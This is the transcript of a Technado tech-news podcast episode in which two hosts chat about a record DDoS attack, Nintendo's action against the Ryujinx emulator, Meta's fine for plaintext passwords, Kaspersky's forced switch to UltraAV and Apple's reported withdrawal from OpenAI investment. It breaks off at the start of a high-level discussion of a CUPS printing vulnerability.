380: Meta Stored Passwords in Plain Text! (Plus, Apple Backs Out of OpenAI Investment?!)

Episode 380 October 03, 2024 01:28:05
380: Meta Stored Passwords in Plain Text! (Plus, Apple Backs Out of OpenAI Investment?!)
Technado
380: Meta Stored Passwords in Plain Text! (Plus, Apple Backs Out of OpenAI Investment?!)

Oct 03 2024 | 01:28:05

/

Show Notes

Put on your tinfoil hats - we get into controversial territory on this week’s episode. AI laws, Nintendo legal smackdowns, North Korean infiltration, and Kaspersky force-downloads…all this and more coming up on Technado!

View Full Transcript

Episode Transcript

[00:00:04] Speaker A: You're listening to Technado. Welcome back for another episode of Technado. Reminder. You can use that code, Technado 30, for a discount on your it pro membership. And it pro comes to us from our sponsor, ACI learning. That's what we do in our day jobs. They're all connected, affiliated. It's all the same. [00:00:22] Speaker B: It's a big, happy family. [00:00:23] Speaker A: Yeah. It's one big web. Man, you're hurting me. So check that. Check that library out. If you're interested in some cybersecurity tech type training, we do that in our day jobs, and we have a lot of fun doing it, but that's not what we're here for. We're here to talk about cyber and tech news, which is decidedly a different brand of fun because we get to look at the world burning around us and laugh, because if we don't, we'll cry. [00:00:45] Speaker B: That's kind of the thing. [00:00:46] Speaker A: That's basically it. That's ridiculous. [00:00:50] Speaker B: Choke back the tears. Throw a smile. [00:00:52] Speaker A: We've got. Honestly, we have some global stuff. We have some Russia related stuff. We got some North Korea related stuff. We got stuff going on in California. So it's gonna be. It's gonna be a good day today. But we always like to start with a little bit of. A little bit of new stuff, stuff that's just coming out the morning of, as we're recording this. And we like to call this breaking news. [00:01:13] Speaker B: Breaking news. [00:01:15] Speaker A: You know, if you listen real closely, you might be able to hear faintly, the last week's. [00:01:20] Speaker B: I doubt the gate, like, if we were talking, you might pick it up, but the gate's probably done. [00:01:23] Speaker A: I must have been last week's. I must have, like, said something, because last week's episode, I went back and watched just the first part, and I could hear right before the real sound effect, I could hear break from Christian. So thank you for that, Christian. [00:01:33] Speaker B: That's funny. [00:01:34] Speaker A: So in this week's breaking news, we have. We have some record breaking. A record breaking DDoS attack, to be exact. It peaked at 3.8. I think that's terabytes. I always get the lowercase and uppercase be mixed up. So you can. [00:01:45] Speaker B: Yeah, what does it matter? We'll just say tbps. You know what it means. You know, the thing. [00:01:52] Speaker A: So it's. It's been mitigated. This was a cloud. Cloudfair mitigated this, but it peaked at that amount. Whatever. Whatever that might mean. And I have to go again. This is just breaking. So we just. I mean, as you can see, it was just posted this morning, October 2, when we're filming this. Happy October, by the way. But this was against, I guess it was against an unidentified customer of a hosting provider that uses Cloudflare. So of course they're not going to expose that, that customer. I can appreciate that. [00:02:19] Speaker B: But listen, all the people that use that service know exactly who went down because they're like, why is this nothing I can't get here? [00:02:27] Speaker A: That is true. That is true. Yeah. Oh, 2.14 billion packets per second is another. Yeah, another rate that they showed. So that is quite a high number. Anytime you see a billion. [00:02:36] Speaker B: Yeah. Apparently the DDoS attack game is getting strong here lately because we saw the whole thing with, like, earlier this year was the HTTP two rapid reset thing, right, which was like the big dog. This was massive. And I think technically that still holds the record, but that's a different type of attack for this type of attack. If I could be off on this. So don't quote me. Fact check the mess out of this. Listen, we're just talking news here, people. I don't have to be 100% accurate. You go do your own research. All I'm telling you is that, hey, look, big, nasty DDoS attack has gone crazy. And, you know, for me, I feel like denial of service attacks are kind of the redhead stepchild of cybersecurity of, like, things that you need to be concerned with. Yeah, but they're like a real problem. [00:03:27] Speaker A: Oh, yeah, right. Well, and with pretty heavy implications, especially, you know, even if you've just got a business or something, even just a little bit of downtime. [00:03:34] Speaker B: Yeah. [00:03:34] Speaker A: At the very least, it affects your reputation. Right. [00:03:37] Speaker B: You know what it is? You're absolutely right. A and B, it's not sexy. Cool. [00:03:42] Speaker A: Yeah. [00:03:42] Speaker B: Right, rcs, that's cool. And that's no joke. The rcs are cool as hell. I mean, you know, except for the horrible part where hackers are breaking in and doing stuff they shouldn't be doing. Not my best favorite part of it, but the act of, like, figuring out the vulnerability and being able to actually manipulate it and exploit it, abuse those things to your own advantage, that is. That's kind of flipping cool. [00:04:05] Speaker A: Make some brains, right? [00:04:07] Speaker B: Send in a bunch of bazillion packets to things so it can't respond. It's just, it doesn't have that pizzazz that pop. [00:04:14] Speaker A: And usually they're, I mean, using things like botnets for this, right? It's. They've got all these machines kind of doing it for them. And so to me, that's kind of what I was thinking as we first pulled this up was like, of all of the different types of attacks that we talk about, I think one of my least favorites is like, like worms and stuff because it's like you just let it propagate itself and it's like, okay, that's great for you. And it's easy, you know, you just, once you get in and you set it running, it kind of does its thing. [00:04:36] Speaker B: Yeah. [00:04:36] Speaker A: Lazy, but you know, hey, it gets the job done. [00:04:38] Speaker B: Yeah, yeah, yeah. [00:04:39] Speaker A: And this is like kind of in the same vein to me. Like, okay, you just, you know, once you, I'm sure it took effort to set up and to get it going, but then it's just you kind of, you're letting a botnet do your work for. Whereas the other stuff like rcs, it does seem like it takes some brains, it takes some effort and some time to figure it out, to maintain persistence and stuff like that once you gain access. [00:04:57] Speaker B: Right. And not that it doesn't take brains and effort to figure out, sure. How to pull off these massive scale, but kind of to Sophia's point is you just kind of build a big packet gun. [00:05:09] Speaker A: Yeah. [00:05:10] Speaker B: Basically is what's going on and you're shooting at your target and it's going, wow, I can't, I can't process all this. And therefore it falls over. Now why I, why I say that? It's kind of the red hat stepchild. We see that denial service. Yeah. Oh, well, what are you going to do? But this is probably one of the bigger issues that a lot of companies have to deal with. Organizations, they have to deal with this. And it just doesn't get the, doesn't get the paper right. It doesn't get the headline because it's like denial of service. Yeah, botnets, they do the thing. But when you start looking into botnets and the traffic and basically the denial of service as a service kind of systems that are out there where you, just as long as you got the money, somebody's got the botnet. Hey, you give me the money, I'll, I'll point this gun at anybody you want me to. And they don't care. If you're ever one of the, if you're ever in an organization that's having to deal with a denial of service attack, it's like a real issue. It's, it's not fun to have to kind of spin up protections to figure out, well, how are they attacking us? How can we mitigate that? So we should probably put that more on the forefront of our minds of like, what are we doing as far as the different types of denial service attacks that might be lobbed against us. [00:06:24] Speaker A: Yeah. [00:06:24] Speaker B: And what are our defenses in that way? We, we tend to just focus on AV eDr. [00:06:29] Speaker A: Sure. [00:06:29] Speaker B: And for good reason. But don't forget there is denial of service out there. [00:06:33] Speaker A: Sure. Yeah. I mean, I'm not going to not put a lock on my door, but I got to worry about the windows too. Like, it's, it's, it's not that it's any less important. It's just, you're right, it doesn't really get the, we don't see headlines about this kind of stuff very often, I don't think. But rcs and stuff that's in the headlines all the time, that's, that's a daily critical vulnerability. [00:06:50] Speaker B: Ten and new malware. And it's malware. See rceshould. And what's the other thing that we probably see most of the time? Breach. Breaches. [00:07:02] Speaker A: Breaches. Breaches of various varieties. Yeah, breaches. Start singing the song. [00:07:08] Speaker B: I'm still gonna make that shirt, right? [00:07:10] Speaker A: Yeah, just, just, well, if you're gonna start using Nintendo imagery. Oh, careful, because that's a great segue. [00:07:17] Speaker B: What you did there. [00:07:18] Speaker A: Nintendo is. They are not done shutting down emulators. So there was an emulator. I'm gonna butcher this. Ryu jinx. Ryujinx. I'm so sorry. Ryu Ryujinx. Yeah, it was shut down after, quote, unquote, contact by Nintendo. And we did talk about a couple months ago, a couple weeks ago. Time's not real. An emulator called, I think it was like Yuzu or something like that, that got shut down. Oh, yeah. So this is not the first time. [00:07:42] Speaker B: Like, dolphin got shut down. Yeah, right. [00:07:44] Speaker A: Like they're going nuts. [00:07:45] Speaker B: Listen, they have always been like this. Always. When I say they, I mean Nintendo. I've talked about this before. I was around when, when the first Nintendo emulators hit. [00:07:57] Speaker A: Yeah. [00:07:57] Speaker B: I was like, this is the coolest thing ever. And then Nintendo was like, it's not the coolest thing ever. I don't like this at all. And even before emulators were a thing, they were suing, like, blockbuster video for you renting their games. [00:08:10] Speaker A: Yeah, right. [00:08:11] Speaker B: And then when the court said, eh, that's a, that's a bridge too far. Right. You know what they did? They sued him again because they were putting the, the booklet that comes with the game. They were making copies of it because. [00:08:25] Speaker A: People were taking them. [00:08:26] Speaker B: Yeah. They would get destroyed or lost or whatever. And they were like, copyright infringement. [00:08:30] Speaker A: Wow. [00:08:31] Speaker B: Right? And then they were like, son of a. So blockbuster had to create their, they hired like, writers and, and people that, and designed their own inserts. [00:08:43] Speaker A: Oh, good for them. [00:08:44] Speaker B: So that they weren't invading the copyright or infringing on the copyright ip of Nintendo. And that's what was going in their sleeves with the games. Like, they, they do not play Nintendo. Don't want you nowhere near their ip. They don't want you looking at their ip. They don't want you breathing near their ip. If you do, there will be hell to pay. I was, I was telling Sophia, I watch a bunch of YouTube channels that cover handhelds that use emulators and things that naturally I'm just like, staying on top of what's going on in the business and especially the handhelds. I'm really interested in retro handhelds and like, rog and Steam and all that stuff that's going on. It's just cool tech. And if I had, you know, unceasing amounts of money, I would buy a bunch of them. But this, I think it was retro Game Corp. And they were showing a new handheld and it was doing wii U emulation and showing you how well it did wii U emulation with, I think, Ryu jinx as the emulator. And he got a hard copyright strike from Nintendo over that, and he said he had to go back and blur all the images in that. From now on, he won't be using any Nintendo games to demonstrate with anymore so that he doesn't have to worry. He's like, I just can't, I just can't fight a billion dollar company, man. I'm like, what the heck? Yeah. He's literally making people want to do stuff with Nintendo and they're like, no. [00:10:18] Speaker A: No, didn't, wasn't there something that when they, when this came up a few months ago, it was. I think we kind of agreed that, like, okay, I could see if there's an emulator that is, I don't know, that news Mario RPG that's coming out brother ship in like, November. If there was an emulator that came out, then next year, that was like, oh, you can emulate this game. I could see Nintendo being like, hey, this is a recent game. We're making money off this, and like, don't do that. Right? [00:10:40] Speaker B: You're cutting into viable profits. [00:10:42] Speaker A: Yeah, sure, exactly. I can understand Nintendo being like, uh, uh, you gotta shut that down. But it was the games that are like, this is no longer, this is such an old game, it's. You don't even make a console anymore. You don't make. [00:10:50] Speaker B: It was only in Japan kind of stuff. [00:10:52] Speaker A: Like, you're not any games, any copies of this game that are being sold, are being sold by, like, gamestop, if that still exists, or ebay or whatever. So Nintendo's not making money off it anyway. [00:11:01] Speaker B: There is a bunch of, like, stores out there that sell retro games, and that's. But again, that money has already been made by Nintendo. [00:11:06] Speaker A: Right? [00:11:07] Speaker B: Nintendo doesn't see a dime on those. [00:11:08] Speaker A: Resales, so what do you care? I guess maybe it's like, so I've. [00:11:12] Speaker B: Heard that it is old school Japan. Like the old school japanese business model is that no one touches your ip. No one, ever. You never give it away. You never do anything. And since a lot of the executives at Nintendo are old school japanese people. [00:11:33] Speaker A: Yeah, that. [00:11:34] Speaker B: That's just their mindset. And you're not teaching that old dog a new trick because they're. I feel. Feel like, personally, that there is a good argument to be made on the historicity of the games, and some of these games are going to. Are dying out. Like, we're going to lose them because they won't release it at all. It's like George Lucas taking the original Star wars films and stick them in a vault and going, nope, you can't have it. Yeah, like, that's weird. This was such an iconic historical event that to shelve it away to a dustbin of history where it never can be seen again or touched seems odd and a disservice to the future. Yeah, that's just my humble opinion. [00:12:19] Speaker A: You would think. You would think. [00:12:20] Speaker B: I'm not saying it's a perfect opinion based on, like, I get there's nuance and gray area to it, but I. [00:12:26] Speaker A: But, yeah, I think. I think you're right, and I think that before. Before we move off of this, there was. This is a different article that I found on this, but the creator of Ryujinx got. They were contacted by Nintendo, and I guess what happened is they were offered an agreement, very vague, to stop working on the project, remove the organization, and all related assets that they're in control of. There was no confirmation on whether the developer took the agreement or whether the creator took the agreement, but the organization's been removed, so it's pretty safe to. [00:12:57] Speaker B: Say they probably took the agreement. [00:12:59] Speaker A: So I don't know if it was like, we'll pay you. I don't know if it was. If it was less an agreement and more like a godfather type agreement. Like, we'll make you an offer you can't refuse, kind of a thing. Who knows? [00:13:09] Speaker B: Luca Brazzi sleeps with the vicious, so. [00:13:13] Speaker A: There'S not a ton of information on that front. But they were working on, like, an iOS port and Android version, and that's all going to happen now. So let's just, you know, rest in peace to another fallen soldier and these poor emulators. I just have to wonder what the future looks like for them. Yeah, but I got to give it to Nintendo. They are. They're on top of it. Their legal team's on top of it. But moving on from our breaking news stuff, speaking of legal issues, another big name meta is dealing with some stuff this week. Never. Never heard of them. Yeah, I wish. Meta find 91 million. I think that's euros, right? For storing millions of Facebook and Instagram passwords in plain text? [00:13:50] Speaker B: Uh oh. [00:13:50] Speaker A: And I think, correct me if I'm wrong, but I think this has been ongoing since, like, 2019 is when this was discovered that they were. Oh, sorry. We were storing passwords in plain text. We didn't realize it. And just now is when this all is coming to, you know, a full circle moment. And now they're gonna have to pay this fine. [00:14:04] Speaker B: Yeah, it looks like they have. They've done a boo boo. They did a, uh oh, shocker. Yeah, shocker. Here was the big takeaway I took from this article. Is that a big companies that probably are putting millions of dollars behind security, following regulation and doing all that stuff, mistakes still get made. I remember back when Don was still on the show, me and him kind of got into a little kerfuffle. Not. Not great, not a big one, but a little disagreement on, I think because Apple got hacked or something. Apple had a hack that happened, and he was like, they just need to do security better. I'm like, they're. They're a trillion dollar company. Do you think they're not that they don't have the best security on earth? Of course they do. [00:14:51] Speaker A: Microsoft security is not the issue. [00:14:53] Speaker B: Microsoft has the best security on earth. Here's the problem. The problem isn't that they're not doing it right. It's that it's really hard. It's really difficult to do well all the time, right? You're asking for sinless perfection 100% of the time. And yes, I get it. They're a huge company. They got a lot of stuff meta. And listen, I'm no fan of meta, but they're going to make mistakes. So if you think that just because they got billions. That they're going to be sinless. Perfection 24 7365. That the problem is you, like, you are making the mistake because people still run that company. People still do the security at that company, and things are going to get overlooked. And anybody that's worked in a corporate system knows that there are all these pressures to get things to do. Oh, we've got deadlines and we have to hit launch dates and we've got, oh, we've promised this and that and the other. And management, who has no idea what goes on to actually make those things happen, goes, hey, I over promised this. You need to deliver. And they're like, shit, how do I do that? And they're just doing the best they can. And when it comes to their security, it's the same thing. It's the same thing. And you're going to overlook something and things are going to happen. Does that excuse them from doing it? Absolutely not. Right. You make the mistake, you got to pay the piper. [00:16:13] Speaker A: Right. And I think, I think a lot of it, and we've talked about this before, is how they react or how they respond and address this stuff. If you have a company like rhymes with fast mast that, you know, maybe has some stuff that comes up and they continually say, no, it's actually not a problem. Well, maybe it is, but it's not that kind of problem. Oh, it is that kind of problem, but it's not as big of a deal as you think. Oh, it's worse after a while. You lose trust. And so it's like, yes, I think you're right. The bigger the company. Yes, you have a lot more resources. Yes, you've got, you know, bigger teams and hopefully better security practices and things like that, but you also then become a bigger target. I think meta is a much bigger target than, you know, any other mom and pop. Right? And also, like you said, you've got, maybe you've got promises that are being made and things that are happening that it's hard to keep track of. Everything, I would imagine, you know, you've, you become this big conglomerate. You've grown so much. So I can see why stuff like this would happen to, they are going to pay this fine, which is, I think, is in euros, but in dollars, that's over 100 million. So no small potatoes. And hopefully this is, like I said, this happened in 2019, so I would hope that this is not still an issue. [00:17:18] Speaker B: Now the question becomes, like, if you didn't have enough reason to distrust meta true and close your Instagram and Facebook accounts, you know, they were storing your passwords in plain text. Yeah, right. Maybe that. That's enough. Just get off these platforms, please. Please. Social. Just dump social media. [00:17:40] Speaker A: I'm pretty sure they're also still using. Unless you're a miner in the European Union, they are still. They are using your data to train their AI models. And it's either very. It's not impossible to opt out. I don't think. I think that would be illegal, but it's very, very, very. [00:17:54] Speaker B: They would really like you to not opt out. [00:17:55] Speaker A: It is such a convoluted pro. I tried to do it, and I'm like, did you really? I'm like, where the hell am I even supposed to go? I opted out really easy from. From Instagram. [00:18:05] Speaker B: It was, like, super easy. [00:18:06] Speaker A: I want you to walk me through. [00:18:06] Speaker B: Deleted my account. I was opted out. It was amazing. [00:18:10] Speaker A: Fair enough. Fair enough. [00:18:12] Speaker B: Now, there might be a few people out there going, but, Daniel, you have an Instagram account. I don't have an Instagram account. [00:18:17] Speaker A: He has somebody that runs it from my wife. [00:18:19] Speaker B: She's like, can I make you an Instagram account? I think you should do on Instagram. Like, I don't care, whatever. [00:18:25] Speaker A: Do whatever you want. [00:18:27] Speaker B: Send me something, and I'll put it on Instagram. [00:18:29] Speaker A: I said, okay, since we're talking about meta really quick, I thought you'd think this was funny. He was talking about, he did, like, an interview this week with. With some news organization, and he was talking about, like, the future of meta and how he thinks, like, smart glasses are gonna replace smartphones in the next ten years and all this stuff. But this is what he looked like. [00:18:44] Speaker B: If you see these dumb things. [00:18:47] Speaker A: So this is what he looks like. Oh, the glasses. [00:18:50] Speaker B: Yeah, yeah, the glasses are cartoonish. [00:18:52] Speaker A: Yeah, they look so dumb. Yeah, he looks like the. [00:18:54] Speaker B: I knew that he had, like, started working out, and so his hair out got a tan. [00:18:59] Speaker A: Some people are like, oh, he's changing his image. But somebody posted a picture of him looking like this and said, he looks like Andy Samberg playing Jack Harlow on SNL. I don't know. That's Jack Harlow. He's a rapper. And I just thought that was. [00:19:11] Speaker B: Looked like that. [00:19:13] Speaker A: He looks like Andy Samberg playing Jack Harlow. [00:19:15] Speaker B: That's legit. [00:19:15] Speaker A: I got a kick out of that. That made me giggle. But, yeah, he was talking about, like, the new. Maybe I can pull out the meta smart glasses or whatever. He looks like Dexter's laboratory wearing things. [00:19:28] Speaker B: My friend has a picture of him of the, like, the Ray ban meta glasses. [00:19:32] Speaker A: Yeah. And they look pretty decent. [00:19:35] Speaker B: They look like fairly normal glasses. They're a little bit thicker than what you would normally see, but not like, insane. And the only I saw that he got them, and I saw it said meta, and I went, oh. And I saw the cameras on either side of his room. I was like, so you're, you're watching me, huh? You recording everything and sending it back to me. [00:19:59] Speaker A: You like, you like being look like 3d printed glasses? [00:20:02] Speaker B: These are ridiculous. They. So my friend's glasses do not look like this. These are augmented reality glasses. [00:20:07] Speaker A: Okay, then maybe that's what I was thinking. [00:20:09] Speaker B: The meta glasses that my friend has. [00:20:11] Speaker A: Are pretty slick looking. [00:20:12] Speaker B: They're not bad. Yeah. [00:20:13] Speaker A: Okay. Okay. Well, it's good to know. I'm not gonna. [00:20:16] Speaker B: I don't like the fact that he's got two cameras in them. [00:20:18] Speaker A: Yeah. [00:20:18] Speaker B: And that, you know, if you don't think all that information is going back to meta. [00:20:23] Speaker A: Oh, absolutely. [00:20:24] Speaker B: And that it's taking images all the time, you are absolutely wrong. [00:20:27] Speaker A: There was something, I didn't pull it for this week, so I won't dwell on it too long. I know we got other stuff to get to, but I saw something that was like, yeah, you know, it's like you said, it's not just when the user prompts it to take a picture, it's just constantly sending information back. It's training itself. Right, on everything that you see. Well, it's retaining that information like you can't really control. It's not like you can say, nope, turn off, I don't want you. Yeah, you can't really do that. So I don't. I think Zuck is wrong. Not that he doesn't have his finger on the pulse of technology, but I don't think smart glasses are going to replace smartphones in the next ten years. I think maybe they'll become more popular. I don't think that's. No, I think that smartphones are going to be around for a long time to come. But what do I know? Right? So moving on from that, not that I don't love to hate on meta sometimes, but moving on, we've got a lovely little segment for you. Following up on some stuff we talked about last week is Deja news. Deja news. Love that little sound effect. [00:21:23] Speaker B: It is. [00:21:24] Speaker A: So you might recall last week we talked about a little, just a little known brand called Kaspersky. You might have heard of him. That unfortunately, or fortunately, depending on how you look at it, is banned now in the US. Right? So they had to. People that were using Kaspersky had to remove this software. And last week they force installed a new software program on people's computers. Kaspersky uninstalled itself and people woke up the next morning and there was this Ultra AV on their, on their machines. And people were understandably very upset about it. [00:21:54] Speaker B: But it's ultra. [00:21:55] Speaker A: It's ultra, it's mega. If you. It's meta. No, it's not. No, it's not. I don't want to get in trouble. [00:22:01] Speaker B: Big news. [00:22:03] Speaker A: But, uh, somebody listen. [00:22:04] Speaker B: Disinformation, Goodwin. [00:22:07] Speaker A: It's misinformation. Thank you. There is a difference apparently. So the, they had a spokesperson because first get a spokesperson that came out defending the choice to force replace this security software. This should be good, right? What defense do you possibly have for this? I believe their spokesperson is named Francisco. [00:22:23] Speaker B: The last Francisco Frank. [00:22:25] Speaker A: Oh, good old Frankie. Yeah, they said. So Kaspersky pushed an uninstalled Kaspersky products and an automatic install of ultra AV, which a lot of people had not even heard of. Um, didn't give people the option on Windows machines. Right. This person said, hey, you were all informed of this process, okay? Us customers that were eligible for this transition, we emailed you. We told you that we were going to do this automatically. And the reason we did it was for your good. We did this so you wouldn't experience a lapse in coverage. Oh, okay. Well, the argument against that then is this. Was this only applied to Windows users? Right? On, on Mac, you had to go in and do this yourself. It couldn't force install itself. I wonder why. But on Windows computers, if you don't have a third party antivirus, or if you have one and then you want to install it, defender switches back on automatically. And it sounds like, based on user reviews, Defender is actually a little better than this Ultra AV product. Now I did a little bit of digging last week after our show and went to the Pango group website. Okay. Or pango, whatever it's called. Website. Okay. [00:23:28] Speaker B: Yeah. [00:23:28] Speaker A: And Kaspersky is listed as a name on that site. And of course I'm not be able to find it now because it took me forever to find the site in the first place. It's hidden quite well. [00:23:35] Speaker B: You should not to bookmark things, right? [00:23:37] Speaker A: Yeah, well, and I did it on my computer at home, so I wouldn't be able to pull it up here anyway. [00:23:40] Speaker B: Oh, you're not. But logged into Firefox like your account all your. [00:23:44] Speaker A: I don't think so. [00:23:45] Speaker B: Marx will sync. [00:23:45] Speaker A: I think I'm just because I don't use my home computer very often. I just pull up on edge. I know. [00:23:50] Speaker B: I'm actually, I'm actually kind of proud. [00:23:51] Speaker A: Oh, really? [00:23:53] Speaker B: Because you're not. [00:23:54] Speaker A: It was more of a lazy thing. But yes, you're right. Yeah. It was a security thing for sure. But when I was looking at this pango group thing, Kaspersky was listed as a name. And I don't know if it was supposed to be a. There was no context of why Kaspersky. And then I think, like, bank of America was another one. No context of like, are these partners, are these people that use our products? But I'm thinking if they're affiliated in any way and we want to get as far away from Kaspersky as possible because they might be, you know, russian government informants and. Da. Da, da. Then why on earth would this be any better of a product? Why would a product coming from Pango, that's not Kaspersky, that's Ultra av. Why would it matter? And the founders of supposedly of this product were both. One of them was from Russia and the other one was from Lithuania. So it's like, if. If the issue is getting away from russian manufactured products or russia based products, this is not any better. So the whole argument for replacing it with this falls apart. Like, it just. What the point? Why was this even allowed to happen? The whole thing is, is weird to me. Um, and I think this defense just falls flat. What do you think? [00:24:49] Speaker B: I agree. Oh, okay. No, I. When they said it last night, like, last week, that was their answer, right? It was like, oh, we want them to make sure that you were. You always had coverage. [00:24:59] Speaker A: Sure. [00:25:00] Speaker B: I appreciate that I said that last week. I appreciate that you don't take, like, a mafioso type approach to making sure that I'm covered by forcing coverage down my throat and go, see, you're covered. Yeah. Eat that. Yeah, it tastes good. That coverage is good for you, right? It's like, I don't think you get how this works. You've been spending a little too much time over there with him, russian mafia people, to understand that, hey, I already have coverage, so why push me to do this? It just seems fishy. And I. Not that I've ever been a Kaspersky defender, per se, I do think that they've gotten a lot of, like, weird reputational thing based off, like, our government and stuff. I've never seen them in my experience. Not that I ever, like, tried to research out Kaspersky and all its KGB ties or whatever, but they've always seemed to been really friendly to the cybersecurity community, always doing good research, offering good papers. There's a lot of benefit that has come out of the Kaspersky group. This has not been one of them. It is not good for them. Just optically it looks bad. This looks like this was a, this was a move that you have made that gave any detractors against Kaspersky a foothold. And go see, yeah, I told you they were fishy. Yeah, because this is fishy as hell. [00:26:29] Speaker A: Because, yeah, there are now people that are saying, because of the apparent tie between this pango group that backs Ultra Av and Kaspersky saying like, oh, well, then Kaspersky must have been. Or this is just a way for them to maintain their foothold. And they're not Kaspersky anymore. Now they're Ultra av. They've just basically rebranded because Ultra AV doesn't really have a super public track record that anybody can really find as far as. Yeah, it's been around for, hey, here's an article from two years ago on how this software works. It just kind of just pops company for very. Yeah, it's just very like sudden. So I don't want to be like, I don't want to say for sure whether or not that's the case. I don't even use Kaspersky. So I don't know why I'm so. [00:27:06] Speaker B: Fired up about I'm skin in the game. [00:27:08] Speaker A: But like, just as an outsider looking in, I'm like, objectively stinks. The whole thing stinks. I don't like it. [00:27:15] Speaker B: It stinks. What was that from the Tobey Maguire? Spider man. They were asking people on the street, what do you think about Spider man? And the cop is like, he stinks and I don't like him. [00:27:24] Speaker A: Oh, sure. I meant more like it stinks of B's, but yes, that too. Sure. And it sounds like you said Kaspersky was, you know, a lot of people like their product, so it's a shame that it's going this way. And they seem to have a pretty decent public image with a lot of people. And I feel like this is just not doing them any favors. So I don't really buy what their spokespeople put out. Curious what y'all think, though, especially there's a whiff. Yeah. Especially if you were a Kaspersky user, if you experienced this like, forcible transition. What do you think about this? Maybe you've heard of, hear about that? I would love to, honestly. And especially, maybe you've heard of Ultra AV before, and I have wrong information. Maybe it's been around. You're like, I've been using this since 2004. I don't know. [00:28:02] Speaker B: There's tons of AV's out there that I've never heard of in my life. I mean, just go to. Go to virustotal, right? And there's like 60 something. [00:28:09] Speaker A: Yeah. [00:28:10] Speaker B: That they use for. For testing against to see what connects with what. [00:28:13] Speaker A: But I just couldn't find anything on it, which is weird to me. [00:28:16] Speaker B: It's just weird. [00:28:16] Speaker A: It's weird to me because you'd think I'd be able to find something anyway. [00:28:20] Speaker B: Strange. [00:28:21] Speaker A: Maybe that's none of my business. I don't know. So we're gonna. [00:28:23] Speaker B: Moving on. [00:28:24] Speaker A: We'll move on. Maybe try to get in one or two more before our break here, if we have time. This is concerning another big brand that we've been talking about a lot in the last few weeks. Despite being one of the biggest selling points of apple intelligence, Apple will note, be investing in OpenAI. Now, I don't want to bear the lead or mislead you all or anything. They are still saying that they are going to incorporate chat GPT into their Apple intelligence features once those roll out, because those Apple intelligence features have not rolled out yet. Sometime before the end of the year, iOS 18 is out. But these features are not. They're still in the works. I don't know. But Chad GPT is still going to be incorporated into that. So they are still going to be working with and using some of OpenAI's technology, or whatever you want to call it, but they're not investing. And up until this point, they were. Yeah, we're going to invest. We're backing them. Backed out at the 11th hour. Now, another important point, or potentially important. Uh, OpenAI previously was a nonprofit. It is now for profit. And it was never supposed to be a for profit company. It was supposed to be, hey, this is artificial intelligence for the benefit of humanity. We're doing this for the good of everyone. We're not looking to make money. [00:29:27] Speaker B: But, you know, then they saw that money, right? I mean, it'd be ashamed. [00:29:31] Speaker A: Money changes things on the table. And their CTO left, it seems like, as a result of that new business model. So there are some changes happening in OpenAI. So that could very well be part of the reason why Apple was like, eh, we'll pass, but they're still gonna be using their technology in their new Apple intelligence, which was a huge selling point. [00:29:48] Speaker B: They're just not investing in it. [00:29:49] Speaker A: Right, exactly. So some people are a little confused. Like if you believe in this product and you're gonna use it in your own technology. [00:29:59] Speaker B: I didn't read the article. [00:30:01] Speaker A: Fair enough. [00:30:01] Speaker B: But it seems like just on its surface, wouldn't that be like a business thing? More, more like that, yeah. Now since it's not open anymore, it's not a nonprofit and all these other things, investing in it is basically investing in another company that they don't own or reap the benefit of, really, at least in any really good ways or the best ways that you could reap the benefits. Like if they were an open source thing, then, yeah, you get all sorts of benefit by investing into it because then, because everybody gets the same benefit. So. But now it's like, oh, I got to pay, you know, and Microsoft, you know what I mean? Like, it just seems like it might be some business thing on the back end. [00:30:48] Speaker A: Yeah, it could be. Um, in fact, I would say that's likely. [00:30:51] Speaker B: Yeah. [00:30:52] Speaker A: Um, I, I did just. [00:30:54] Speaker B: Did they offer any. [00:30:55] Speaker A: Pull this. So this, this article has more information on OpenAI being kind of in a weird spot right now. But looking at a different source here, it seemed a little sensationalist. So I didn't want to grab it at first, but it said, oh, bankruptly. Bankruptcy flames linger as apple wiggles out of its latest billion, you know, billion dollar. [00:31:12] Speaker B: They're worried about losing their $6.5 billion. [00:31:15] Speaker A: Right. [00:31:16] Speaker B: Because OpenAI is going to go. [00:31:18] Speaker A: Supposedly they are on the brink of bankruptcy uniform with projections of $5 billion losses within twelve months. And that's no small numbers. I'm sure OpenAI probably, I mean, it's a company that works with big numbers. It's a very big company and I think its products appear to be pretty popular, but they are apparently facing a lot of losses. Reportedly on the brink of bankruptcy. Reportedly, reportedly. [00:31:37] Speaker B: Listen, you can have a great product, but if you are not running the company that delivers that product very well, guess what happens to the company. [00:31:45] Speaker A: And maybe that's why they're switching a for profit they're trying to salvage. [00:31:48] Speaker B: Hey, maybe, maybe we should go for a cash grab. [00:31:50] Speaker A: So that's part of why they're doing this, they're trying to get funding is because to prevent them from falling into bankruptcy. [00:31:56] Speaker B: That seems reasonable. [00:31:57] Speaker A: And it was supposed to be Microsoft. Nvidia and Apple were the big three that we're going to invest in Apple, which makes sense. So now it's, Nvidia's still looking at investing and Microsoft is looking at backing them. As well. But we'll see. I don't know if OpenAI is changing their business structure and everything. [00:32:11] Speaker B: And if they go, if they go for profit, does that put them on the table to be acquired? [00:32:17] Speaker A: Good question. [00:32:18] Speaker B: Right. [00:32:18] Speaker A: Oh, that would be interesting. [00:32:19] Speaker B: So then one of those companies acquires them. [00:32:21] Speaker A: Yeah. [00:32:22] Speaker B: Now that's ours. [00:32:24] Speaker A: Hmm. [00:32:25] Speaker B: Right. [00:32:26] Speaker A: Yeah, because then, well, the only good thing that come out of that is if Microsoft acquires that, they can get rid of that stupid copilot and just replace it with Chad. GPT. I'm sorry, that's. [00:32:34] Speaker B: They are, they are really committed to copilot. [00:32:37] Speaker A: I'm still sick and tired of copilot. I'm so sick of hearing about it. So yeah, allegedly OpenAI is running on fumes and Apple is not looking to save them is how this is seeming to shape up again. I don't want to assume, but figured I'd throw that in there because we did talk quite a bit about Apple intelligence and that was a big selling point for it. So that'll do it for that one. Let's see, we've got 123456. [00:32:58] Speaker B: We get another one. [00:32:59] Speaker A: You think we get another one? All right, I'm going to have you take a lead on this one because I didn't read this one. Attacking Unix systems via cups, part one. I think this is a write up by like a researcher, right? [00:33:09] Speaker B: It is. This is the person that discovered the vulnerability. Oh, so this is their, this is what kind of like the, the narrative of what occurred. [00:33:15] Speaker A: Oh, okay. [00:33:16] Speaker B: So if you're looking into like really get some meat and potatoes on this. Yeah. You can go to hacker News or whatever, but the details are in this article that we have available, which I'm sure we make. [00:33:27] Speaker A: Yeah, we'll put them in the description. [00:33:28] Speaker B: Yeah. So cups been around a hot minute. This is the printer service that you find in Unix systems. And it's been doing its job for quite some time. Ultimately a researcher discovered that I can, through cups protocols, I can basically install a printer without authentication. And then I can tack on some code as part of that printer. And then 